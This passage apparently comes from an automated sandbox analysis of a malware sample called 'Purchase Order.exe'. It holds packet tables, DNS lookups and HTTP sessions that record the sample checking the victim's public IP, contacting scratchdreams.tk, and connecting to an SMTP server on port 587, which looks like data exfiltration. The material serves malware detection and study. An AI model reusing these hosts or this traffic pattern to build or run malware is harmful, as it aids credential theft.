                                                                                                          Apr 4, 2024 16:34:14.263164997 CEST44349739104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.560910940 CEST44349739104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.561012983 CEST44349739104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.561048985 CEST49739443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:14.561647892 CEST49739443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:14.565387011 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:14.575236082 CEST4974080192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:14.812674999 CEST8049740132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.812804937 CEST4974080192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:14.812968016 CEST4974080192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.047707081 CEST8049740132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.048676014 CEST8049740132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.050384998 CEST49741443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:15.050411940 CEST44349741104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.050477982 CEST49741443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:15.050772905 CEST49741443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:15.050786018 CEST44349741104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.098759890 CEST4974080192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.239372015 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.314496040 CEST44349741104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.316273928 CEST49741443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:15.316301107 CEST44349741104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.472263098 CEST8049738132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.472362995 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.618216991 CEST44349741104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.618320942 CEST44349741104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.618396044 CEST49741443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:15.626867056 CEST49741443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:15.630439043 CEST4974080192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.631664038 CEST4974280192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.865098953 CEST8049740132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.865171909 CEST4974080192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.866369009 CEST8049742132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:15.866461992 CEST4974280192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:15.866674900 CEST4974280192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:16.101296902 CEST8049742132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.101897001 CEST8049742132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.103255033 CEST49743443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:16.103296995 CEST44349743104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.103374004 CEST49743443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:16.103738070 CEST49743443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:16.103753090 CEST44349743104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.145656109 CEST4974280192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:16.362977028 CEST44349743104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.365505934 CEST49743443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:16.365537882 CEST44349743104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.666508913 CEST44349743104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.666624069 CEST44349743104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.666688919 CEST49743443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:16.667550087 CEST49743443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:16.678457022 CEST4974480192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:16.917109966 CEST8049744132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:16.917179108 CEST4974480192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:16.917351007 CEST4974480192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:17.152025938 CEST8049744132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.152823925 CEST8049744132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.154602051 CEST49745443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:17.154620886 CEST44349745104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.154692888 CEST49745443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:17.155025959 CEST49745443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:17.155036926 CEST44349745104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.208092928 CEST4974480192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:17.418869019 CEST44349745104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.421188116 CEST49745443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:17.421197891 CEST44349745104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.729572058 CEST44349745104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.729681969 CEST44349745104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.729737997 CEST49745443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:17.730254889 CEST49745443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:17.734054089 CEST4974480192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:17.734752893 CEST4974680192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:17.968838930 CEST8049744132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.968955040 CEST4974480192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:17.969995022 CEST8049746132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:17.970072985 CEST4974680192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:18.193528891 CEST4974680192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:18.428843021 CEST8049746132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:18.429286003 CEST8049746132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:18.430496931 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:18.430529118 CEST44349747104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:18.430602074 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:18.430854082 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:18.430877924 CEST44349747104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:18.473723888 CEST4974680192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:18.695019960 CEST44349747104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:18.739343882 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:19.317559004 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:19.317580938 CEST44349747104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:19.456711054 CEST44349747104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:19.456829071 CEST44349747104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:19.456891060 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:19.546295881 CEST49747443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:19.550509930 CEST4974680192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:19.551656008 CEST4974880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:19.779017925 CEST8049748132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:19.779222965 CEST4974880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:19.784717083 CEST4974880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:19.785707951 CEST8049746132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:19.785767078 CEST4974680192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:20.011974096 CEST8049748132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.012692928 CEST8049748132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.014051914 CEST49749443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:20.014082909 CEST44349749104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.014183998 CEST49749443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:20.014434099 CEST49749443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:20.014446020 CEST44349749104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.067493916 CEST4974880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:20.272327900 CEST44349749104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.274235010 CEST49749443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:20.274267912 CEST44349749104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.966732025 CEST44349749104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.966831923 CEST44349749104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.966991901 CEST49749443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:20.967681885 CEST49749443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:20.982283115 CEST4974880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:21.209534883 CEST8049748132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:21.209609032 CEST4974880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:21.376530886 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:21.376559019 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:21.376626968 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:21.377207994 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:21.377221107 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:21.652173042 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:21.652255058 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:21.654599905 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:21.654612064 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:21.654851913 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:21.656260967 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:21.700243950 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:53.238745928 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:53.238818884 CEST44349750104.21.27.85192.168.2.4
                                                                                                          Apr 4, 2024 16:34:53.238886118 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:53.244195938 CEST49750443192.168.2.4104.21.27.85
                                                                                                          Apr 4, 2024 16:34:58.621007919 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:34:58.817766905 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:34:58.817861080 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:34:59.330108881 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:34:59.330379963 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:34:59.525322914 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:34:59.525512934 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:34:59.528502941 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:34:59.725707054 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:34:59.726001024 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:34:59.928127050 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:34:59.928333998 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:35:00.125015020 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:35:00.125196934 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:35:00.338974953 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:35:00.343394995 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:35:00.539192915 CEST58749756208.91.199.224192.168.2.4
                                                                                                          Apr 4, 2024 16:35:00.539319992 CEST49756587192.168.2.4208.91.199.224
                                                                                                          Apr 4, 2024 16:35:21.101502895 CEST8049742132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:35:21.101569891 CEST4974280192.168.2.4132.226.247.73

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Apr 4, 2024 16:34:10.109018087 CEST6071353192.168.2.41.1.1.1
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST53607131.1.1.1192.168.2.4
                                                                                                          Apr 4, 2024 16:34:10.996990919 CEST4983153192.168.2.41.1.1.1
                                                                                                          Apr 4, 2024 16:34:11.123584986 CEST53498311.1.1.1192.168.2.4
                                                                                                          Apr 4, 2024 16:34:20.983082056 CEST5388953192.168.2.41.1.1.1
                                                                                                          Apr 4, 2024 16:34:21.375829935 CEST53538891.1.1.1192.168.2.4
                                                                                                          Apr 4, 2024 16:34:58.492333889 CEST5356953192.168.2.41.1.1.1
                                                                                                          Apr 4, 2024 16:34:58.620039940 CEST53535691.1.1.1192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Apr 4, 2024 16:34:10.109018087 CEST192.168.2.41.1.1.10x49caStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:10.996990919 CEST192.168.2.41.1.1.10x63ecStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:20.983082056 CEST192.168.2.41.1.1.10xf80Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:58.492333889 CEST192.168.2.41.1.1.10x339bStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST1.1.1.1192.168.2.40x49caNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST1.1.1.1192.168.2.40x49caNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST1.1.1.1192.168.2.40x49caNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST1.1.1.1192.168.2.40x49caNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST1.1.1.1192.168.2.40x49caNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:10.234538078 CEST1.1.1.1192.168.2.40x49caNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:11.123584986 CEST1.1.1.1192.168.2.40x63ecNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:11.123584986 CEST1.1.1.1192.168.2.40x63ecNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:21.375829935 CEST1.1.1.1192.168.2.40xf80No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:21.375829935 CEST1.1.1.1192.168.2.40xf80No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:58.620039940 CEST1.1.1.1192.168.2.40x339bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:58.620039940 CEST1.1.1.1192.168.2.40x339bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:58.620039940 CEST1.1.1.1192.168.2.40x339bNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                          Apr 4, 2024 16:34:58.620039940 CEST1.1.1.1192.168.2.40x339bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • reallyfreegeoip.org
                                                                                                          • scratchdreams.tk
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449735132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:10.476751089 CEST151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Apr 4, 2024 16:34:10.709006071 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 79a952a518eef58671e6246d6c44202e
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                                                          Apr 4, 2024 16:34:10.713816881 CEST127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Apr 4, 2024 16:34:10.952943087 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 25932b39e79de9bc744b0041007e439d
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                                                          Apr 4, 2024 16:34:11.708281040 CEST127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Apr 4, 2024 16:34:11.960510015 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 1c8ddcf7f394174071115590680359bb
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449738132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:13.766841888 CEST127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Apr 4, 2024 16:34:14.001847029 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:13 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: ed65ef5727bee272ab47a97a7f2538dd
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449740132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:14.812968016 CEST127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Apr 4, 2024 16:34:15.048676014 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: cebc8a775a75d7f684a68ada748397d6
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449742132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:15.866674900 CEST127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Apr 4, 2024 16:34:16.101897001 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:15 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: d5b128e0e022a07e39ac726019d465f5
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449744132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:16.917351007 CEST151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Apr 4, 2024 16:34:17.152823925 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:17 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 6fc1683160c2f9ffbf711b3c4a050b82
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449746132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:18.193528891 CEST151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Apr 4, 2024 16:34:18.429286003 CEST324INHTTP/1.1 200 OK
